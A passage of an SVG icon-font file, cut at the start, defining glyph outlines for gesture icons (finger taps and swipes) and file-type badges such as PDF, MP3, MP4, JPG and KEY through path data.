69.704-5.504 101.821-15.705 61.516 68.568 150.81 111.705 250.179 111.705 185.568 0 336-150.432 336-336 0-107.026-50.040-202.365-128-263.896v42.193z" />
<glyph unicode="&#xec3d;" glyph-name="two-fingers-double-tap2" d="M336 544v0c79.367 0 144-64.41 144-143.863v-432.137h-288v432.137c0 79.465 64.471 143.863 144 143.863zM336 480c-44.183 0-80-36.114-80-80.313v-111.687h160v111.687c0 44.356-35.509 80.313-80 80.313v0zM256 192v-32h160v32h-160zM256 128v-32h160v32h-160zM688 640v0c79.367 0 144-64.543 144-144.161v-527.839h-288v527.839c0 79.727 64.471 144.161 144 144.161zM688 576c-44.183 0-80-36.114-80-80.313v-111.687h160v111.687c0 44.356-35.509 80.313-80 80.313v0zM608 288v-32h160v32h-160zM608 224v-32h160v32h-160zM896 376.186c20.354 35.259 32 76.176 32 119.814 0 132.548-107.452 240-240 240-95.877 0-178.623-56.22-217.070-137.493-38.45 26.186-84.902 41.493-134.93 41.493-132.548 0-240-107.452-240-240 0-43.638 11.646-84.555 32-119.814v119.923c0 114.768 93.125 207.891 208 207.891 58.68 0 111.784-24.386 149.646-63.591 21.792 91.495 104.121 159.591 202.354 159.591 114.641 0 208-93.076 208-207.891v-119.923zM896 274.296c59.089 55.459 96 134.271 96 221.704 0 167.895-136.105 304-304 304-97.522 0-184.318-45.92-239.946-117.318-34.675 13.757-72.481 21.318-112.054 21.318-167.895 0-304-136.105-304-304 0-87.433 36.911-166.245 96-221.704v-42.193c-77.96 61.531-128 156.87-128 263.896 0 185.568 150.432 336 336 336 35.495 0 69.704-5.504 101.821-15.705 61.516 68.568 150.81 111.705 250.179 111.705 185.568 0 336-150.432 336-336 0-107.026-50.040-202.365-128-263.896v42.193z" />
<glyph unicode="&#xec3e;" glyph-name="two-fingers-tap" d="M336 544v0c79.367 0 144-64.41 144-143.863v-432.137h-288v432.137c0 79.465 64.471 143.863 144 143.863zM336 512c-61.856 0-112-50.025-112-111.728v-400.272h224v400.272c0 61.706-50.27 111.728-112 111.728v0zM336 480v0c44.491 0 80-35.957 80-80.313v-111.687h-160v111.687c0 44.199 35.817 80.313 80 80.313zM336 448c-26.51 0-48-21.713-48-48.027v-79.973h96v79.973c0 26.524-21.306 48.027-48 48.027v0zM256 192v-32h160v32h-160zM256 128v-32h160v32h-160zM688 640v0c79.367 0 144-64.543 144-144.161v-527.839h-288v527.839c0 79.727 64.471 144.161 144 144.161zM688 608c-61.856 0-112-50.272-112-112.225v-495.775h224v495.775c0 61.98-50.27 112.225-112 112.225v0zM688 576v0c44.491 0 80-35.957 80-80.313v-111.687h-160v111.687c0 44.199 35.817 80.313 80 80.313zM688 544c-26.51 0-48-21.713-48-48.027v-79.973h96v79.973c0 26.524-21.306 48.027-48 48.027v0zM608 288v-32h160v32h-160zM608 224v-32h160v32h-160zM864 332.83c39.718 42.82 64 100.16 64 163.17 0 132.548-107.452 240-240 240-95.877 0-178.623-56.22-217.070-137.493-38.45 26.186-84.902 41.493-134.93 41.493-132.548 0-240-107.452-240-240 0-63.011 24.282-120.35 64-163.17v-44.221c-58.733 49.892-96 124.29-96 207.391 0 150.221 121.779 272 272 272 44.233 0 85.999-10.558 122.917-29.292 48.361 75.359 132.891 125.292 229.083 125.292 150.221 0 272-121.779 272-272 0-83.101-37.267-157.499-96-207.391v44.221z" />
<glyph unicode="&#xec3f;" glyph-name="two-fingers-tap2" d="M336 544v0c79.367 0 144-64.41 144-143.863v-432.137h-288v432.137c0 79.465 64.471 143.863 144 143.863zM336 480c-44.183 0-80-36.114-80-80.313v-111.687h160v111.687c0 44.356-35.509 80.313-80 80.313v0zM256 192v-32h160v32h-160zM256 128v-32h160v32h-160zM688 640v0c79.367 0 144-64.543 144-144.161v-527.839h-288v527.839c0 79.727 64.471 144.161 144 144.161zM688 576c-44.183 0-80-36.114-80-80.313v-111.687h160v111.687c0 44.356-35.509 80.313-80 80.313v0zM608 288v-32h160v32h-160zM608 224v-32h160v32h-160zM864 332.83c39.718 42.82 64 100.16 64 163.17 0 132.548-107.452 240-240 240-95.877 0-178.623-56.22-217.070-137.493-38.45 26.186-84.902 41.493-134.93 41.493-132.548 0-240-107.452-240-240 0-63.011 24.282-120.35 64-163.17v-44.221c-58.733 49.892-96 124.29-96 207.391 0 150.221 121.779 272 272 272 44.233 0 85.999-10.558 122.917-29.292 48.361 75.359 132.891 125.292 229.083 125.292 150.221 0 272-121.779 272-272 0-83.101-37.267-157.499-96-207.391v44.221z" />
<glyph unicode="&#xec40;" glyph-name="one-finger-swipe-left3" d="M384.893 512c8.015 72.095 69.029 128 143.107 128 79.367 0 144-64.543 144-144.161v-527.839h-288v512h-193.6l104-104-24-24-144 144 144 144 24-24-104-104h194.493zM528 608c-61.856 0-112-50.272-112-112.225v-495.775h224v495.775c0 61.98-50.27 112.225-112 112.225v0zM528 576v0c44.491 0 80-35.957 80-80.313v-111.687h-160v111.687c0 44.199 35.817 80.313 80 80.313zM528 544c-26.51 0-48-21.713-48-48.027v-79.973h96v79.973c0 26.524-21.306 48.027-48 48.027v0zM448 288v-32h160v32h-160zM448 224v-32h160v32h-160z" />
<glyph unicode="&#xec41;" glyph-name="one-finger-swipe-left4" d="M384.893 512v0 0c8.015 72.095 69.029 128 143.107 128 79.367 0 144-64.543 144-144.161v-527.839h-288v512h-193.6l104-104-24-24-144 144 144 144 24-24-104-104h194.493zM528 576c-44.183 0-80-36.114-80-80.313v-111.687h160v111.687c0 44.356-35.509 80.313-80 80.313v0zM448 288v-32h160v32h-160zM448 224v-32h160v32h-160z" />
<glyph unicode="&#xec42;" glyph-name="one-finger-swipe-right3" d="M640 480v-512h-288v527.839c0 79.727 64.471 144.161 144 144.161 73.921 0 135.061-55.989 143.103-128h194.497l-104 104 24 24 144-144-144-144-24 24 104 104h-193.6zM496 608c-61.856 0-112-50.272-112-112.225v-495.775h224v495.775c0 61.98-50.27 112.225-112 112.225v0zM496 576v0c44.491 0 80-35.957 80-80.313v-111.687h-160v111.687c0 44.199 35.817 80.313 80 80.313zM496 544c-26.51 0-48-21.713-48-48.027v-79.973h96v79.973c0 26.524-21.306 48.027-48 48.027v0zM416 288v-32h160v32h-160zM416 224v-32h160v32h-160z" />
<glyph unicode="&#xec43;" glyph-name="one-finger-swipe-right4" d="M639.103 512h194.497l-104 104 24 24 144-144-144-144-24 24 104 104h-193.6v-512h-288v527.839c0 79.727 64.471 144.161 144 144.161 73.921 0 135.061-55.989 143.103-128v0 0zM496 576c-44.183 0-80-36.114-80-80.313v-111.687h160v111.687c0 44.356-35.509 80.313-80 80.313v0zM416 288v-32h160v32h-160zM416 224v-32h160v32h-160z" />
<glyph unicode="&#xec44;" glyph-name="one-finger-swipe-up3" d="M512 639.122v194.478l-104-104-24 24 144 144 144-144-24-24-104 104v-194.483c71.874-7.981 128-69.084 128-143.278v-527.839h-288v527.839c0 74.305 56.001 135.327 128 143.282zM528 608c-61.856 0-112-50.272-112-112.225v-495.775h224v495.775c0 61.98-50.27 112.225-112 112.225v0zM528 576v0c44.491 0 80-35.957 80-80.313v-111.687h-160v111.687c0 44.199 35.817 80.313 80 80.313zM528 544c-26.51 0-48-21.713-48-48.027v-79.973h96v79.973c0 26.524-21.306 48.027-48 48.027v0zM448 288v-32h160v32h-160zM448 224v-32h160v32h-160z" />
<glyph unicode="&#xec45;" glyph-name="one-finger-swipe-up4" d="M512 639.122v194.478l-104-104-24 24 144 144 144-144-24-24-104 104v-194.483c71.874-7.981 128-69.084 128-143.278v-527.839h-288v527.839c0 74.305 56.001 135.327 128 143.282zM528 576c-44.183 0-80-36.114-80-80.313v-111.687h160v111.687c0 44.356-35.509 80.313-80 80.313v0zM448 288v-32h160v32h-160zM448 224v-32h160v32h-160z" />
<glyph unicode="&#xec46;" glyph-name="one-finger-swipe-down3" d="M544 224v-193.6l104 104 24-24-144-144-144 144 24 24 104-104v193.6h-128v527.839c0 79.727 64.471 144.161 144 144.161 79.367 0 144-64.543 144-144.161v-527.839h-128zM528 864c-61.856 0-112-50.272-112-112.225v-495.775h224v495.775c0 61.98-50.27 112.225-112 112.225v0zM528 832v0c44.491 0 80-35.957 80-80.313v-111.687h-160v111.687c0 44.199 35.817 80.313 80 80.313zM528 800c-26.51 0-48-21.713-48-48.027v-79.973h96v79.973c0 26.524-21.306 48.027-48 48.027v0zM448 544v-32h160v32h-160zM448 480v-32h160v32h-160z" />
<glyph unicode="&#xec47;" glyph-name="one-finger-swipe-down4" d="M512 224h-128v527.839c0 79.727 64.471 144.161 144 144.161 79.367 0 144-64.543 144-144.161v-527.839h-128v-193.6l104 104 24-24-144-144-144 144 24 24 104-104v193.6zM528 832c-44.183 0-80-36.114-80-80.313v-111.687h160v111.687c0 44.356-35.509 80.313-80 80.313v0zM448 544v-32h160v32h-160zM448 480v-32h160v32h-160z" />
<glyph unicode="&#xec48;" glyph-name="file-numbers" d="M288 480v-160h-32v224h32l96-160v160h32v-224h-32l-96 160zM576 544h32v-159.811c0-35.82-28.724-64.189-64.156-64.189h-31.688c-35.551 0-64.156 28.739-64.156 64.189v159.811h32v-159.906c0-17.725 14.165-32.094 31.967-32.094h32.067c17.655 0 31.967 14.012 31.967 32.094v159.906zM720 448l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348z" />
<glyph unicode="&#xec49;" glyph-name="file-numbers2" d="M288 480v-160h-32v224h32l96-160v160h32v-224h-32l-96 160zM576 544h32v-159.811c0-35.82-28.724-64.189-64.156-64.189h-31.688c-35.551 0-64.156 28.739-64.156 64.189v159.811h32v-159.906c0-17.725 14.165-32.094 31.967-32.094h32.067c17.655 0 31.967 14.012 31.967 32.094v159.906zM720 448l48 96h32v-224h-32v160l-32-64h-32l-32 64v-160h-32v224h32l48-96zM256.219 640c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h543.562c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-543.562z" />
<glyph unicode="&#xec4a;" glyph-name="file-pages" d="M576 416v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64zM256 480v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM288 512h64.033c17.801 0 31.967-14.327 31.967-32 0-17.796-14.312-32-31.967-32h-64.033v64zM704.156 544c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688z" />
<glyph unicode="&#xec4b;" glyph-name="file-pages2" d="M576 416h-64v32h96v-128h-95.844c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189h95.844v-32h-96.006c-17.67 0-31.994-14.199-31.994-31.994v-96.012c0-17.67 14.199-31.994 31.994-31.994h64.006v64zM256 480v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM256.219 640c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h543.562c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-543.562zM288 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM704.156 544h31.688c35.551 0 64.156-28.654 64.156-64h-32c0 17.498-14.312 32-31.967 32h-32.067c-17.801 0-31.967-14.327-31.967-32 0-17.796 14.461-32 32.3-32h31.7c35.593 0 64-28.654 64-64 0-35.593-28.724-64-64.156-64h-31.688c-35.551 0-64.156 28.669-64.156 64.035v0.184h32v-0.362c0-17.256 14.312-31.857 31.967-31.857h32.067c17.801 0 31.967 14.327 31.967 32 0 17.796-14.461 32-32.3 32h-31.7c-35.593 0-64 28.654-64 64 0 35.593 28.724 64 64.156 64z" />
<glyph unicode="&#xec4c;" glyph-name="file-app" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM384 416h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM319.967 512c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM448 480v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM480 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM640 480v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM672 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xec4d;" glyph-name="file-app2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM384 416v-96h32v160c0 35.346-28.605 64-64.156 64h-31.688c-35.432 0-64.156-28.407-64.156-64v-160h32v96h96zM319.967 512c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM448 480v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM480 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM640 480v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM672 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xec4e;" glyph-name="file-png" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM256 480v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM288 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM480 480v-160h-32v224h32l96-160v160h32v-224h-32l-96 160zM768 416v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64z" />
<glyph unicode="&#xec4f;" glyph-name="file-png2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM256 480v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM288 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM480 480l96-160h32v224h-32v-160l-96 160h-32v-224h32v160zM768 416v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64z" />
<glyph unicode="&#xec50;" glyph-name="file-pdf2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM672 448v64h128v32h-160v-224h32v96h96v32h-96zM256 480v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM288 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM448 544h95.844c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-95.844v224zM480 512v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033z" />
<glyph unicode="&#xec51;" glyph-name="file-pdf3" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM672 448v64h128v32h-160v-224h32v96h96v32h-96zM256 480v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM288 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM448 544v-224h95.844c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-95.844zM480 512v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033z" />
<glyph unicode="&#xec52;" glyph-name="file-mp3" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM336 448l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM640 480c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64 0-19.214-8.37-36.334-21.648-48.021 13.292-11.727 21.648-28.875 21.648-47.979 0-35.593-28.724-64-64.156-64h-31.688c-35.551 0-64.156 28.654-64.156 64h32c0-17.673 14.165-32 31.967-32h32.067c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-32.033v32h32.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-32.067c-17.655 0-31.967-14.204-31.967-32h-32zM448 480v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM480 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xec53;" glyph-name="file-mp32" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM336 448l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM640 480h32c0 17.796 14.312 32 31.967 32h32.067c17.801 0 31.967-14.327 31.967-32 0-17.796-14.312-32-31.967-32h-32.033v-32h32.033c17.801 0 31.967-14.327 31.967-32 0-17.796-14.312-32-31.967-32h-32.067c-17.801 0-31.967 14.327-31.967 32h-32c0-35.346 28.605-64 64.156-64h31.688c35.432 0 64.156 28.407 64.156 64 0 19.104-8.356 36.252-21.648 47.979 13.278 11.688 21.648 28.807 21.648 48.021 0 35.346-28.605 64-64.156 64h-31.688c-35.432 0-64.156-28.407-64.156-64zM448 480v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM480 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xec54;" glyph-name="file-mp4" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM736 416h-57.6l57.6 80v-80zM736 384v-64h32v64h32v32h-32v128h-32l-96-128v-32h96zM336 448l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM448 480v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM480 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xec55;" glyph-name="file-mp42" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM736 416v80l-57.6-80h57.6zM736 384v-64h32v64h32v32h-32v128h-32l-96-128v-32h96zM336 448l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM448 480v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM480 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xec56;" glyph-name="file-mov" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM512.156 544h31.688c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189zM511.967 512c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM336 448l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM720 376l48 168h32l-64-224h-32l-64 224h32l48-168z" />
<glyph unicode="&#xec57;" glyph-name="file-mov2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM512.156 544c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-31.688zM511.967 512c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM336 448l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM720 376l-48 168h-32l64-224h32l64 224h-32l-48-168z" />
<glyph unicode="&#xec58;" glyph-name="file-jpg" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM256 416v-31.811c0-35.451 28.605-64.189 64.156-64.189h31.688c35.432 0 64.156 28.37 64.156 64.189v159.811h-32v-160.295c0-17.274-14.312-31.705-31.967-31.705h-32.067c-17.801 0-31.967 14.327-31.967 32v32h-32zM448 480v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM480 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM768 416v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64z" />
<glyph unicode="&#xec59;" glyph-name="file-jpg2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM256 416v-31.811c0-35.451 28.605-64.189 64.156-64.189h31.688c35.432 0 64.156 28.37 64.156 64.189v159.811h-32v-160.295c0-17.274-14.312-31.705-31.967-31.705h-32.067c-17.801 0-31.967 14.327-31.967 32v32h-32zM448 480v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM480 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM768 416v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64z" />
<glyph unicode="&#xec5a;" glyph-name="file-key" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM480 416v-64h128v-32h-160v224h160v-32h-128v-64h96v-32h-96zM288 406.4v-86.4h-32v224h32v-86.4l86.398 86.4h41.602l-112-112 112-112h-41.602l-86.398 86.4zM736 416v-96h-32v96l-64 96v32h32v-32l48-72 48 72v32h32v-32l-64-96z" />
<glyph unicode="&#xec5b;" glyph-name="file-key2" d="M256.219 640c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h543.562c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-543.562zM480 416v-64h128v-32h-160v224h160v-32h-128v-64h96v-32h-96zM288 406.4v-86.4h-32v224h32v-86.4l86.398 86.4h41.602l-112-112 112-112h-41.602l-86.398 86.4zM736 416v-96h-32v96l-64 96v32h32v-32l48-72 48 72v32h32v-32l-64-96z" />
